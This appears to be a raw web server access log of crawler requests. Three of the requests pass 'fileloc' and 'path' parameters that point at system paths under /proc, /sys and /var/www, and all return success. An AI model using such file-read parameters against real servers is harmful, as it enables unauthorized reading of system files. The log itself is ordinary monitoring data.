51.77.43.178 - - [10/Nov/2025:00:42:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sched&path=//proc/657 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:00:42:41 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Fmouse1%2Fdevice%2Fdevice%2Finput%2Finput5%2Fdevice%2Fresetafter&path=%2F%2Fsys%2Fclass%2Finput%2Fevent2%2Fsubsystem%2Fmouse1%2Fdevice%2Fdevice%2Finput%2Finput5%2Fdevice HTTP/1.1" 200 2687 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:42:42 +0000] "GET /54jba44946.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:42:43 +0000] "GET /robots.txt HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
